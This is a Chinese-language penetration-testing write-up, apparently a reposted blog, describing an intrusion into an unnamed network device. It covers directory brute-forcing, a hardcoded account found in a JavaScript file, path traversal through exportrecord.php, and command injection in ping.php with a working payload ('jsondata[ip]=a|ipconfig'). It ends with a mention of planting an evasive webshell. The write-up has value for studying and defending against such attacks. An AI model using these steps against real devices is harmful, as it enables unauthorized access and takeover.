某设备产品漏洞挖掘-从JS文件挖掘RCE

前言

某次渗透过程中碰到了个设备产品,通过一些黑盒测试小技巧获取目标权限
某设备产品漏洞挖掘-从JS文件挖掘RCE_第1张图片

信息收集

【点击获取网络安全学习资料·攻略】

  1. 2000多本网络安全系列电子书
  2. 网络安全标准题库资料
  3. 项目源码
  4. 网络安全基础入门、Linux、web安全、攻防方面的视频
  5. 网络安全学习路线图

首先拿到了目标,同样也需要对设备进行信息收集,登录页面有滑块验证和账号密码请求包加密
某设备产品漏洞挖掘-从JS文件挖掘RCE_第2张图片
暂时先放弃从JS里获取密码加密方法,先尝试找一些接口来获取信息,查看源代码
某设备产品漏洞挖掘-从JS文件挖掘RCE_第3张图片
访问一下JS目录,这里有一个小技巧,当目录存在时会自动在后面加上 /, 例如浏览器访问 /js, 将会变成 /js/ 来访问

https://xxx.xxx.xxx.xxx/js

某设备产品漏洞挖掘-从JS文件挖掘RCE_第4张图片
这里简单测试一下发现存在的目录可以通过判断403来确定目录存在,对下一步文件爆破提供帮助,这里使用Gobuster进行爆破
某设备产品漏洞挖掘-从JS文件挖掘RCE_第5张图片
获取到的存在的目录信息

/js/ (Status: 403)
/lan/ (Status: 403)
/php/ (Status: 403)
/images/ (Status: 403)
/html/ (Status: 403)
/vendors/ (Status: 403)
/upload/ (Status: 403)

我们需要注意的为 js 与 php 目录下的文件,才可能存在突破口,首先爆破 js目录下的 js文件
某设备产品漏洞挖掘-从JS文件挖掘RCE_第6张图片
获取后通过爬虫遍历 JS文件下载到本地翻阅,其中发现 /js/index.js 文件中有敏感信息,猜想可能是后门账号或者默认密码
某设备产品漏洞挖掘-从JS文件挖掘RCE_第7张图片
拿着拿到的账号去登录一下试试
某设备产品漏洞挖掘-从JS文件挖掘RCE_第8张图片
成功登录目标系统,用户为 administrator, 查看存在的用户发现这个可能是后门账户

漏洞挖掘

任意文件读取漏洞 (exportrecord.php)
目前我们以及获取到了目标的后台管理权限,且权限比较高,我们可以继续测试漏洞
之前爆破到了 php目录,猜测为功能性文件,我们可以通过 js文件中的信息获取一些文件名和接口信息
某设备产品漏洞挖掘-从JS文件挖掘RCE_第9张图片
这里在 backup.js 文件中发现一个有关的下载接口

function downloadBak(index) {
     
    var data = $('#backupList').bootstrapTable("getData");
    if (index >= 0 && index < data.length) {
     
        var downurl = '../php/exportrecord.php?downname=' + data[index].id;
        window.open(downurl);
    }
}

猜测 downname参数为文件名,测试能不能下载文件

/php/exportrecord.php?downname=exportrecord.php

某设备产品漏洞挖掘-从JS文件挖掘RCE_第10张图片
这里得到了 /php/exportrecord.php 文件

传入downname参数,没有对 …/ 符号过滤,就导致跳目录读取文件
现在我们有了一个任意文件读取,我们再通过目录爆破获取更多的PHP文件源码
某设备产品漏洞挖掘-从JS文件挖掘RCE_第11张图片

远程命令执行漏洞 (ping.php)

通过刚刚到目录爆破我们看到一个非常值得注意的文件 ping.php,设备中常见的网络联通性测试文件,也是设备中常见的漏洞点, 通过文件读取漏洞读取文件
某设备产品漏洞挖掘-从JS文件挖掘RCE_第12张图片

function systemopr($type, $ip, $times=4){
     
     $info = array();     
     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){
     
           //linux
           if($type == "0"){
     
               exec("ping -c $times $ip", $info);
           }else if($type == "1"){
     
               exec("traceroute -m $times -w 1 $ip", $info);
           }else{
     
               exec($ip, $info);
          }
     }else{
     
          //windows
          if($type == "0"){
     
               exec("ping $ip -n $times", $info);
          }else if($type == "1"){
     
               exec("tracert -h $times -w 1000 $ip", $info);
          }else{
     
               exec($ip, $info);
          }
     }
     return $info;
}
?>

这里可以看到这里接收的参数 jsondata数组中的 ip参数,用户可控造成命令拼接,而且通过 exec 执行,并且会 return到页面中,导致回显的RCE

POST /php/ping.php

jsondata[ip]=a|ipconfig&jsondata[type]=1

某设备产品漏洞挖掘-从JS文件挖掘RCE_第13张图片
目标为Windows系统,测试写入phpinfo文件
某设备产品漏洞挖掘-从JS文件挖掘RCE_第14张图片
写入免杀并流量加密的Webshell,尝试获取目标设备权限
某设备产品漏洞挖掘-从JS文件挖掘RCE_第15张图片
某设备产品漏洞挖掘-从JS文件挖掘RCE_第16张图片

最后

点击查看【网络安全学习资料·攻略】,私信我获取网络安全学习资料

你可能感兴趣的